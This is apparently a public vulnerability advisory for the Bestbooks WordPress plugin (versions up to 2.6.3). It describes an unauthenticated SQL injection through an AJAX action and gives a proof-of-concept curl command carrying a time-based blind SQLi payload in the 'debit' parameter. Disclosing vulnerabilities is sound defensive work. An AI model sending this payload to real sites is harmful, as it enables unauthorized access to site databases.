WordPress Plugin Vulnerabilities
Bestbooks <= 2.6.3 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Proof of Concept
Affected parameters: credit and debit curl https://example.com/wp-admin/admin-ajax.php \ --data 'action=bestbooks_add_transaction&type=x&account=x&date=x&description=3&debit=(CASE WHEN (9277=9277) THEN SLEEP(5) ELSE 9277 END)&credit=1'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-17 (about 1 years ago)
Added
2022-05-17 (about 1 years ago)
Last Updated
2022-05-18 (about 1 years ago)